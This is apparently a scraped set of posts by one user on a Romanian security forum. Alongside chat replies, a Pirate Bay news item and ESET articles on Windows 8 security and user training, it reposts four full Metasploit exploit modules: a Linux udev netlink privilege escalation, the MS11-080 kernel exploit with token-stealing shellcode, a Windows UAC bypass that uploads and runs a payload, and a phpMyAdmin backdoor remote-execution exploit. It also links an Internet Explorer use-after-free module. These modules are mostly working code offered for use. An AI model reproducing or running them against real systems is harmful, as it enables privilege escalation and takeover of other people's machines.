Nytro

Pumba: $acces_list = array(3871, 1, 528, 1348, 22968); Cine chiar are nevoie de acces imi spune motivul si vedem.

Pfoai, cat de tare. DA, daca o sa decryptati acel sir de caractere o sa vedeti cine e "vinovatul". E ceva cu "jSoN".

Nu aici. Daca mai vine cineva cu cate-o stire foarte interesanta din lte domenii, poate posta la Offtopic de exemplu, dar nu facem categorie pentru discutii din alte domenii.

Da-i un PM utilizatorului "tex" de aici, in care sa ii descrii pasiunea ta pentru manele si te va ajuta.

The Pirate Bay s-a mutat in cloud de Liviu Petrescu | 18 octombrie 2012 Pentru a evita raziile politiei, site-ul de torente The Pirate Bay se muta in cloud. Piratii suedezi renunta complet la servere. In acest mod, este asigurata accesibilitatea continua, iar costurile de intretinere scad in mod semnificativ. Dupa o perioada dificila pentru The Pirate Bay, cu probleme tehnice, dar si problemele legale pentru fondatorii site-ului, torentele intra in cloud, scrie CNET. Renuntarea la servere in favoarea stocarii cloud asigura activitatea neintrerupta a The Pirate Bay, deoarece informatiile sale vor fi stocate pe servere situate pe mai multe continente, usor de schimbat. "Ascensiunea" in cloud a The Pirate Bay ingreuneaza si orice efort de a inchide site-ul, atata vreme cat baza sa de date este criptata si ascunsa in numeroase servere cloud. Daca miscarea The Pirate Bay va fi urmata si de alte site-uri ce distribuie continut piratat, lupta impotriva pirateriei online va fi ingreunata. Sursa: The Pirate Bay s-a mutat in cloud | Hit.ro Tot respectul pentru baieti

http://gifura.orzhk.org/src/1332235315120.swf

Request-urile HTTP catre /pagina.php ?

[h=1]Linux udev Netlink Local Privilege Escalation[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/linux/priv' require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/local/unix' #load 'lib/msf/core/post/file.rb' #load 'lib/msf/core/exploit/local/unix.rb' #load 'lib/msf/core/exploit/local/linux.rb' #load 'lib/msf/core/exploit/local/linux_kernel.rb' class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Post::Common include Msf::Exploit::Local::LinuxKernel include Msf::Exploit::Local::Linux include Msf::Exploit::Local::Unix def initialize(info={}) super( update_info( info, { 'Name' => 'Linux udev Netlink Local Privilege Escalation', 'Description' => %q{ Versions of udev < 1.4.1 do not verify that netlink messages are coming from the kernel. This allows local users to gain privileges by sending netlink messages from userland. }, 'License' => MSF_LICENSE, 'Author' => [ 'kcope', # discovery 'Jon Oberheide', # 95-udev-late.rules technique 'egypt' # metasploit module ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'References' => [ [ 'CVE', '2009-1185' ], [ 'OSVDB', '53810' ], [ 'BID', '34536' ] ], 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ], [ 'Linux x64', { 'Arch' => ARCH_X86_64 } ], #[ 'Command payload', { 'Arch' => ARCH_CMD } ], ], 'DefaultOptons' => { 'WfsDelay' => 2 }, 'DefaultTarget' => 0, 'DisclosureDate' => "", } )) register_options([ OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ]), OptInt.new("NetlinkPID", [ false, "Usually udevd pid-1. Meterpreter sessions will autodetect" ]), ], self.class) end def exploit if datastore["NetlinkPID"] and datastore["NetlinkPID"] != 0 netlink_pid = datastore["NetlinkPID"] else print_status("Attempting to autodetect netlink pid...") netlink_pid = autodetect_netlink_pid end if not netlink_pid print_error "Couldn't autodetect netlink PID, try specifying it manually." print_error "Look in /proc/net/netlink for a PID near that of the udevd process" return else print_good "Found netlink pid: #{netlink_pid}" end sc = Metasm::ELF.new(@cpu) sc.parse %Q| #define DEBUGGING #define NULL ((void*)0) #ifdef __ELF__ .section ".bss" rwx .section ".text" rwx .entrypoint #endif call main push eax call exit | # Set up the same include order as the bionic build system. # See external/source/meterpreter/source/bionic/libc/Jamfile cparser.lexer.include_search_path = [ "external/source/meterpreter/source/bionic/libc/include/", "external/source/meterpreter/source/bionic/libc/private/", "external/source/meterpreter/source/bionic/libc/bionic/", "external/source/meterpreter/source/bionic/libc/kernel/arch-x86/", "external/source/meterpreter/source/bionic/libc/kernel/common/", "external/source/meterpreter/source/bionic/libc/arch-x86/include/", ] cparser.parse(%Q| #define DEBUGGING // Fixes a parse error in bionic's libc/kernel/arch-x86/asm/types.h #ifndef __extension__ #define __extension__ #endif // Fixes a parse error in bionic's libc/include/sys/cdefs_elf.h // Doing #if on an undefined macro is fine in GCC, but a parse error in // metasm. #ifndef __STDC__ #define __STDC__ 0 #endif #include <sys/types.h> #include <stdarg.h> #include <stdio.h> #include <unistd.h> #include <errno.h> |) [ "external/source/meterpreter/source/bionic/libc/bionic/__errno.c", "external/source/meterpreter/source/bionic/libc/bionic/__set_errno.c", "external/source/meterpreter/source/bionic/libc/stdio/stdio.c", ].each do |fname| cparser.parse(File.read(fname), fname) end payload_path = "#{datastore["WritableDir"]}/#{Rex::Text.rand_text_alpha(10)}" evil_path = "#{datastore["WritableDir"]}/#{Rex::Text.rand_text_alpha(10)}" unix_socket_h(sc) linux_x86_syscall_wrappers(sc) main = %Q^ #include <string.h> #include <linux/netlink.h> #define NULL 0 int main() { int sock; struct iovec iov; struct sockaddr_nl sa; struct msghdr msg; char *mp; char message[4096]; memset(sa, 0, sizeof(sa)); sa.nl_family = AF_NETLINK; sa.nl_pid = #{netlink_pid}; sa.nl_groups = 0; memset(&msg, 0x00, sizeof(struct msghdr)); msg.msg_name = (void *)&sa; msg.msg_namelen = sizeof(sa); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = NULL; msg.msg_controllen = 0; msg.msg_flags = 0; sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); bind(sock, (struct sockaddr *) &sa, sizeof(sa)); mp = message; mp += sprintf(mp, "remove@/d") + 1; mp += sprintf(mp, "SUBSYSTEM=block") + 1; mp += sprintf(mp, "DEVPATH=/dev/#{Rex::Text.rand_text_alpha(10)}") + 1; mp += sprintf(mp, "TIMEOUT=10") + 1; mp += sprintf(mp, "ACTION=remove") +1; mp += sprintf(mp, "REMOVE_CMD=#{payload_path}") +1; iov.iov_base = (void*)message; iov.iov_len = (int)(mp-message); sendmsg(sock, &msg, 0); close(sock); return 0; } ^ cparser.parse(main, "main.c") asm = cpu.new_ccompiler(cparser, sc).compile sc.parse asm sc.assemble begin elf = sc.encode_string rescue print_error "Metasm Encoding failed: #{$!}" elog "Metasm Encoding failed: #{$!.class} : #{$!}" elog "Call stack:\n#{$!.backtrace.join("\n")}" return end pl = payload.encoded_exe print_status "Writing payload executable (#{pl.length} bytes) to #{payload_path}" write_file(payload_path, pl) print_status "Writing exploit executable (#{elf.length} bytes) to #{evil_path}" write_file(evil_path, elf) print_status "chmod'ing and running it..." cmd_exec("chmod 755 #{evil_path} #{payload_path}") cmd_exec("#{evil_path}") rm_f(evil_path, payload_path) end def autodetect_netlink_pid netlink_pid = nil case session.type when "meterpreter" print_status("Meterpreter session, using get_processes to find netlink pid") process_list = session.sys.process.get_processes udev_proc = process_list.find {|p| p["name"] =~ /udevd/ } udev_pid = udev_proc["pid"] print_status "udev pid: #{udev_pid}" netlink = read_file("/proc/net/netlink") netlink.each_line do |line| pid = line.split(/\s+/)[2].to_i if pid == udev_pid - 1 netlink_pid = pid break end end else print_status("Shell session, trying sh script to find netlink pid") netlink_pid = cmd_exec( %q^ for netlink_pid in $(awk '{print $3}' /proc/net/netlink |sort -u|grep -v -- -); do for udev_pid in $(ps aux | grep [u]devd | awk '{print $2}'); do [ $(( $udev_pid-1 )) = $netlink_pid ] && echo $netlink_pid ; done; done ^) netlink_pid = nil if netlink_pid.empty? end netlink_pid end end Sursa: Linux udev Netlink Local Privilege Escalation

[h=1]MS11-080 AfdJoinLeaf Privilege Escalation[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/windows/priv' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking # Average because this module relies on memory corruption within the # kernel, this is inherently dangerous. Also if the payload casues # the system process that it was injected into to die then it's also # possible that the system may become unstable. include Msf::Post::Common include Msf::Post::Windows::Priv def initialize(info={}) super(update_info(info, { 'Name' => 'MS11-080 AfdJoinLeaf Privilege Escalation', 'Description' => %q{ This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it's own token to avoid causing system instability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matteo Memelli', # original exploit and all the hard work 'Spencer McIntyre' # MSF module ], 'Arch' => [ ARCH_X86 ], 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Automatic', { } ], [ 'Windows XP SP2 / SP3', { 'HaliQuerySystemInfo' => 0x16bba, 'HalpSetSystemInformation' => 0x19436, '_KPROCESS' => "\x44", '_TOKEN' => "\xc8", '_UPID' => "\x84", '_APLINKS' => "\x88" } ], [ 'Windows Server 2003 SP2', { 'HaliQuerySystemInfo' => 0x1fa1e, 'HalpSetSystemInformation' => 0x21c60, '_KPROCESS' => "\x38", '_TOKEN' => "\xd8", '_UPID' => "\x94", '_APLINKS' => "\x98" } ], ], 'References' => [ [ 'CVE', '2011-2005' ], [ 'MSB', 'MS11-080' ], [ 'EDB', 18176 ], [ 'URL', 'http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/' ] ], 'DisclosureDate'=> 'Nov 30 2011', 'DefaultTarget' => 0 })) register_options([ ]) end def find_sys_base(drvname) session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]]) session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]]) results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4) addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*") addresses.each do |address| results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48) current_drvname = results['lpBaseName'][0..results['return'] - 1] if drvname == nil if current_drvname.downcase.include?('krnl') return [address, current_drvname] end elsif drvname == results['lpBaseName'][0..results['return'] - 1] return [address, current_drvname] end end end # Function borrowed from smart_hashdump def get_system_proc # Make sure you got the correct SYSTEM Account Name no matter the OS Language local_sys = resolve_sid("S-1-5-18") system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}" # Processes that can Blue Screen a host if migrated in to dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"] session.sys.process.processes.each do |p| # Check we are not migrating to a process that can BSOD the host next if dangerous_processes.include?(p["name"]) next if p["pid"] == session.sys.process.getpid next if p["pid"] == 4 next if p["user"] != system_account_name return p end end def exploit if sysinfo["Architecture"] =~ /wow64/i print_error("Running against WOW64 is not supported") return elsif sysinfo["Architectore"] =~ /x64/ print_error("Running against 64-bit systems is not supported") return end mytarget = target if mytarget.name =~ /Automatic/ os = sysinfo["OS"] if os =~ /windows xp/i mytarget = targets[1] end if ((os =~ /2003/) and (os =~ /service pack 2/i)) mytarget = targets[2] end if ((os =~ /\.net server/i) and (os =~ /service pack 2/i)) mytarget = targets[2] end if mytarget.name =~ /Automatic/ print_error("Could not identify the target system, it may not be supported") return end print_status("Running against #{mytarget.name}") end if is_system? print_error("This meterpreter session is already running as SYSTEM") return end this_proc = session.sys.process.open kernel_info = find_sys_base(nil) base_addr = 0x1001 print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}") result = session.railgun.ws2_32.WSASocketA("AF_INET", "SOCK_STREAM", "IPPROTO_TCP", nil, nil, 0) socket = result['return'] irpstuff = rand_text_alpha(8) irpstuff << "\x00\x00\x00\x00" irpstuff << rand_text_alpha(4) irpstuff << "\x01\x00\x00\x00" irpstuff << "\xe8\x00" + "4" + "\xf0\x00" irpstuff << rand_text_alpha(231) if not this_proc.memory.writable?(0x1000) session.railgun.add_function( 'ntdll', 'NtAllocateVirtualMemory', 'DWORD', [ ["DWORD", "ProcessHandle", "in"], ["PBLOB", "BaseAddress", "inout"], ["PDWORD", "ZeroBits", "in"], ["PBLOB", "RegionSize", "inout"], ["DWORD", "AllocationType", "in"], ["DWORD", "Protect", "in"] ]) result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ base_addr ].pack("L"), nil, [ 0x1000 ].pack("L"), "MEM_COMMIT | MEM_RESERVE", "PAGE_EXECUTE_READWRITE") end if not this_proc.memory.writable?(0x1000) print_error('Failed to properly allocate memory') return end this_proc.memory.write(0x1000, irpstuff) hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1) hKernel = hKernel['return'] halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable") halDispatchTable = halDispatchTable['return'] halDispatchTable -= hKernel halDispatchTable += kernel_info[0] print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}") halbase = find_sys_base("hal.dll")[0] haliQuerySystemInformation = halbase + mytarget['HaliQuerySystemInfo'] halpSetSystemInformation = halbase + mytarget['HalpSetSystemInformation'] print_status("HaliQuerySystemInformation Address: 0x#{haliQuerySystemInformation.to_s(16)}") print_status("HalpSetSystemInformation Address: 0x#{halpSetSystemInformation.to_s(16)}") #### Exploitation #### shellcode_address_dep = 0x0002071e shellcode_address_nodep = 0x000207b8 padding = make_nops(2) halDispatchTable0x4 = halDispatchTable + 0x4 halDispatchTable0x8 = halDispatchTable + 0x8 restore_ptrs = "\x31\xc0" restore_ptrs << "\xb8" + [ halpSetSystemInformation ].pack("L") restore_ptrs << "\xa3" + [ halDispatchTable0x8 ].pack("L") restore_ptrs << "\xb8" + [ haliQuerySystemInformation ].pack("L") restore_ptrs << "\xa3" + [ halDispatchTable0x4 ].pack("L") tokenstealing = "\x52" tokenstealing << "\x53" tokenstealing << "\x33\xc0" tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" tokenstealing << "\x8b\x40" + mytarget['_KPROCESS'] tokenstealing << "\x8b\xc8" tokenstealing << "\x8b\x98" + mytarget['_TOKEN'] + "\x00\x00\x00" tokenstealing << "\x89\x1d\x00\x09\x02\x00" tokenstealing << "\x8b\x80" + mytarget['_APLINKS'] + "\x00\x00\x00" tokenstealing << "\x81\xe8" + mytarget['_APLINKS'] + "\x00\x00\x00" tokenstealing << "\x81\xb8" + mytarget['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" tokenstealing << "\x75\xe8" tokenstealing << "\x8b\x90" + mytarget['_TOKEN'] + "\x00\x00\x00" tokenstealing << "\x8b\xc1" tokenstealing << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00" tokenstealing << "\x5b" tokenstealing << "\x5a" tokenstealing << "\xc2\x10" restore_token = "\x52" restore_token << "\x33\xc0" restore_token << "\x64\x8b\x80\x24\x01\x00\x00" restore_token << "\x8b\x40" + mytarget['_KPROCESS'] restore_token << "\x8b\x15\x00\x09\x02\x00" restore_token << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00" restore_token << "\x5a" restore_token << "\xc2\x10" shellcode = padding + restore_ptrs + tokenstealing this_proc.memory.write(shellcode_address_dep, shellcode) this_proc.memory.write(shellcode_address_nodep, shellcode) this_proc.memory.protect(0x00020000) addr = [ 2, 4455, 0x7f000001, 0, 0 ].pack("s!S!L!L!L!") result = session.railgun.ws2_32.connect(socket, addr, addr.length) if result['return'] != 0xffffffff print_error("The socket is not in the correct state") return end session.railgun.add_function( 'ntdll', 'NtDeviceIoControlFile', 'DWORD', [ [ "DWORD", "FileHandle", "in" ], [ "DWORD", "Event", "in" ], [ "DWORD", "ApcRoutine", "in" ], [ "DWORD", "ApcContext", "in" ], [ "PDWORD", "IoStatusBlock", "out" ], [ "DWORD", "IoControlCode", "in" ], [ "LPVOID", "InputBuffer", "in" ], [ "DWORD", "InputBufferLength", "in" ], [ "LPVOID", "OutputBuffer", "in" ], [ "DWORD", "OutPutBufferLength", "in" ] ]) session.railgun.add_function( 'ntdll', 'NtQueryIntervalProfile', 'DWORD', [ [ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ] ]) print_status("Triggering AFDJoinLeaf pointer overwrite...") result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) if not is_system? print_error("Exploit failed") return end begin proc = get_system_proc print_status("Injecting the payload into SYSTEM process: #{proc["name"]} PID: #{proc["pid"]}") host_process = client.sys.process.open(proc["pid"], PROCESS_ALL_ACCESS) mem = host_process.memory.allocate(payload.encoded.length + (payload.encoded.length % 1024)) print_status("Writing #{payload.encoded.length} bytes at address #{"0x%.8x" % mem}") host_process.memory.write(mem, payload.encoded) host_process.thread.create(mem, 0) rescue ::Exception => e print_error("Failed to Inject Payload") print_error(e.to_s) end # Restore the token because apparently BSODs are frowned upon print_status("Restoring the original token...") shellcode = padding + restore_ptrs + restore_token this_proc.memory.write(shellcode_address_dep, shellcode) this_proc.memory.write(shellcode_address_nodep, shellcode) result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) end end Sursa: MS11-080 AfdJoinLeaf Privilege Escalation

Windows Escalate UAC Execute RunAs ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Post::Common include Exploit::EXE include Post::File def initialize(info={}) super( update_info( info, 'Name' => 'Windows Escalate UAC Execute RunAs', 'Description' => %q{ This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. }, 'License' => MSF_LICENSE, 'Author' => [ 'mubix <mubix[at]hak5.org>' # Port to local exploit ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ] ], 'DisclosureDate'=> "Jan 3, 2012" )) register_options([ OptString.new("FILENAME", [ false, "File name on disk"]), OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]), OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]) ]) end def exploit root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") open_key = session.sys.registry.open_key(root_key, base_key) lua_setting = open_key.query_value('EnableLUA') if lua_setting.data == 1 print_status "UAC is Enabled, checking level..." else print_good "UAC is not enabled, no prompt for the user" end uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') case uac_level.data when 2 print_status "UAC is set to 'Always Notify'" print_status "The user will be prompted, wait for them to click 'Ok'" when 5 print_debug "UAC is set to Default" print_debug "The user will be prompted, wait for them to click 'Ok'" when 0 print_good "UAC is not enabled, no prompt for the user" end # # Generate payload and random names for upload # payload = generate_payload_exe if datastore["FILENAME"] payload_filename = datastore["FILENAME"] else payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" end if datastore["PATH"] payload_path = datastore["PATH"] else payload_path = session.fs.file.expand_path("%TEMP%") end cmd_location = "#{payload_path}\\#{payload_filename}" if datastore["UPLOAD"] print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...") fd = session.fs.file.new(cmd_location, "wb") fd.write(payload) fd.close end session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5) end end Sursa: Windows Escalate UAC Execute RunAs + http://www.exploit-db.com/exploits/21845/

[h=1]phpMyAdmin 3.5.2.2 server_sync.php Backdoor[/h] ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor', 'Description' => %q{ This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'ConnectionType' => 'find', }, # Arbitrary big number. The payload gets sent as an HTTP # response body, so really it's unlimited 'Space' => 262144, # 256k }, 'DefaultOptions' => { 'WfsDelay' => 30 }, 'DisclosureDate' => 'Sep 25 2012', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0)) register_options([ OptString.new('PATH', [ true , "The base directory containing phpMyAdmin try", '/phpMyAdmin']) ], self.class) end def exploit uris = [] tpath = datastore['PATH'] if tpath[-1,1] == '/' tpath = tpath.chop end pdata = "c=" + Rex::Text.to_hex(payload.encoded, "%") res = send_request_raw( { 'global' => true, 'uri' => tpath + "/server_sync.php", 'method' => 'POST', 'data' => pdata, 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Length' => pdata.length, } }, 1.0) handler end end Sursa: phpMyAdmin 3.5.2.2 server_sync.php Backdoor

Microsoft Internet Explorer execCommand Use-After-Free Vulnerability Modul Metasploit Download: http://dev.metasploit.com/redmine/projects/framework/repository/revisions/aac41e91fd38f99238971892d61ead4cfbedabb4/entry/modules/exploits/windows/browser/ie_execcommand_uaf.rb

Haide bre, nimic nu e gratis. Desi nu platiti bani pentru serviciile folosite, platiti cu informatii personale, interese... lucruri care prin "business intelligence" devin profitabile pentru Google: reclame, statistici...

Futu-va-n gura, ii speriati pe tineri

https://www.youtube.com/watch?v=fMhgTVlKoTk&feature=related

Eu nu am primit avertisment :">

The amount of stupid posts is too damn high...

"Organizatorul are dreptul s? publice, s? promoveze ?i s? foloseasc? în campanii de marketing aplica?iile dezvoltate de concuren?i la eveniment, concuren?ii exprimându-?i prin înscrierea la evenimnet acordul expres în aceast? privin??. Publicarea, promovarea ?i utilizarea aplica?iilor dezvoltate în cadrul evenimentului se face de c?tre organizator f?r? obliga?ia de a remunera în orice fel participan?ii. Organizatorul are dreptul s? publice con?inutul aplica?iilor dezvoltate, precum ?i numele persoanelor care au dezvoltat aplica?iile respective." Posibil sa apar pe acolo.

[h=1]Overview of VoIP and Voice Over IP Concepts October 10, 2012[/h] Streamed live on Oct 10, 2012 by elithecomputerguy In this Daily Blob Eli the Computer Guy talks about VoIP and how it works. Youtube:

Windows 8: FUD* for thought *Fear, Uncertainty, Doubt Aryeh Goretsky, MVP, ZCSE Table of contents Introduction 3 Defender of the faith 4 Giving rootkits the boot 5 Nuts and bolts 6 Microsoft draws a line in the silicon 7 Sending criminals on the ELAM 8 To mend and defend 9 The evolution of evil 9 Attacking Windows 8 10 Social engineering: a hidden flaw? 10 Sensory (mis)perception 10 Developers: the new targets of opportunity? 11 Summing it all up/Windows 8 by the numbers 12 Author bio 14 About ESET 14 Introduction In September of 2011, Microsoft released the first public preview of Windows 8, the next generation of their flagship desktop operating system, at the BUILD Developer Conference 1, 2. Despite a flurry of pre-Microsoft leaks, interest in Windows 8 remained high, and the official release of the Windows 8 Developer Preview received a groundswell of attention in blogs, articles and elsewhere. A subsequent release, titled Consumer Preview, was released at the end of February 2012. While it contained some GUI changes, such as removal of the Start button from the taskbar, most of the changes to it were internal. Three months later, at the end of May, the Release Preview of Microsoft Windows 8 was released, with the user interface, feature set and APIs being close to (if not already) final. Much of the interest in Windows 8 focuses on cosmetic changes, such as the new modern Windows 8 interface (formerly known as the Metro user interface) and replacement of the Start Menu with the Start Screen, but substantial improvements have been made to Windows security, as well. In this white paper, we will look at some of these changes, and what they mean to Windows 8’s users. Defender of the faith One of the most widely discussed features of Windows 8 is the inclusion of Windows Defender with the new operating system. While this is not a new tool—Windows Defender has been included with all versions of Windows since Vista was released in 2005—previous versions of Windows Defender were limited to protecting users against spyware. The version of Windows Defender included with Windows 8 is actually a rebadged version of Microsoft Security Essentials, which has led at least one prominent journalist to predict the end of antivirus software, or at least those from third parties 3. If that refrain sounds familiar, it may be because you have heard it before: similar predictions were bandied about when it was announced that Windows Vista would include Windows Defender 4, 5, 6 and a raft of new security features, such as User Account Control 7, a Microsoft implementation of a least-privilege model for users. Windows Defender as included with Windows 8 is a good product and does, in fact, provide a decent level of protection, especially when compared against other free anti-malware programs. However, Windows Defender does not contain many of the advanced features and functions of paid-for solutions, such as a high level of granularity for threat detection, task scheduling, centralized management and reporting and so forth. As with other free anti-malware programs, support options for Windows Defender are limited. Many new computers purchased with Windows 8, however, will not have Windows Defender installed as their default antimalware program. Many computer manufacturers ship their computers with a trial version of a commercial anti-malware program installed on them. This is because those manufacturers receive payments from the anti-malware vendors to preload the software onto the computers they sell 8. Computer manufacturers also receive a royalty when the computer user purchases a license for the trial product, and when the license is renewed. While the amount of revenue this generates from each individual is not huge—perhaps $15-to-30 USD—when multiplied over tens or hundreds of thousands of computers, it becomes millions of dollars in revenue that computer manufacturers get from anti-malware companies. Microsoft has made it easy for computer manufacturers to disable Windows Defender so that they may continue to receive payments from antimalware vendors in exchange for bundling their anti-malware software 9, 10, 11. ------------------------------------------------------------------ Download: http://go.eset.com/us/resources/white-papers/ESETNA_WP-Windows8-FUD.pdf

Study finds 90 percent have no recent cybersecurity training Veniti la Defcamp: https://rstcenter.com/forum/60027-defcamp-2012-bucuresti-30-noiembrie-2-decembrie.rst by Stephen Cobb ESET Security Evangelist A new study finds that only 1 in 10 consumers have had any classes or training about protecting their computer and/or their personal information during the last 12 months. Indeed, a shocking 68 percent say they have never had any such training, ever. These and other findings, first revealed by ESET at the Virus Bulletin conference in Dallas, come just in time for National Cyber Security Awareness Month. In our ongoing efforts to better understand the information security challenges that we, as a society, now face, ESET asked a cross-section of computer users several security-related questions. The most worrying findings? Only 1 in 10 people who regularly use a computer or other digital device to connect to the Internet have received any kind of cyber security training in the last 12 months, and more than two thirds have never had any such training. That 68/32 split you see in the pie chart rang a bell with us because it mirrored a different ESET poll, conducted by Harris earlier this year. The purpose of that poll was to study implications of the bring-your-own-device or BYOD trend. We asked employed U.S. adults if they had received any kind of computer security training from their employer and only 32 percent said they had. Another 64 percent said they had not and 4 percent said they couldn’t recall having such training, which probably means it was not worth remembering. Clearly, with two separate surveys indicating that under a third of Internet users have had security training, we could be doing a much better job of educating employees and consumers about cybersecurity. More cyber-security training needed, and needed now While the total number of people in our latest survey who received no training was disappointing, things appear even worse when you take a closer look. Most of those who got training received it more than 12 months ago. Given the rate at which new threats emerge, and new defensive behaviors are needed, finding that only 10% had received any security training in the last 12 months was very disappointing. Here is the full breakdown of responses to the question: “Have you ever had any classes or training about protecting your computer and/or your personal information?” No training ever: 68% Yes, in last 12 months: 10% Yes 1-2 years ago: 5% Yes, 3-5 years ago: 5.5% More than 5 years ago: 11.5% Frankly, I find these numbers alarming in their implications for cybersecurity, the protection of the data streams that have become the lifeblood of our digital economy and our nation’s critical infrastructure. These findings also cast doubt on the perennial assertion by some experts that security problems mainly arise from the stupidity of users. In light of these survey results it is worth asking whether the stupidity lies more with those who expect to achieve system security without providing any education on the subject to the people who use the systems. During the evolution of computer security over the last 20 years there has been a persistent hope that security was a problem that could be solved technologically, therefore saving us the trouble of educating computer users about security. Clearly, that has not happened and, ironically, the improvements made in security technology have actually shifted the point of attack to users. Consider two current trends: 1. 64-bit malware: As my colleague Aleksandr Matrosov pointed out his analysis of the Rovnix bootkit framework, the task of writing malicious code that can successfully exploit 64-bit systems is getting harder. At the same time, marketing projections tell us that more and more systems will be 64-bit, a growing obstacle for cyber-criminals. 2. Gateways to control applications: Both Apple and Microsoft are looking to restrict the installation of applications by end users in order to control the quality, and legitimacy, of application code. Users will need additional persuading (or social engineering) in order for malware to circumvent these controls. The implications of these two trends? People who seek to profit from unauthorized access to our data and systems will be forced, increasingly, to try to exploit human vulnerability. Tricking users into compromising their systems (and other systems to which they then connect) will be increasingly important as an attack vector. And that means the case for arming all computer using humans with security training is stronger than ever. Sadly, these survey results suggest there is a ton of work to do before we can hope to achieve that goal. In the next installment of statistics from our recent survey we will explore consumer knowledge of cybersecurity in the absence of widespread training and look at some of the educational initiatives ESET is working on. In the meantime, please explore all that is going on in October for National Cyber Security Awareness Month. For example, you might want to point friends and family to the cybersecurity training modules that ESET has made available free of charge to Internet users in North America for the month of October. Sursa: Study finds 90 percent have no recent cybersecurity training | ESET ThreatBlog

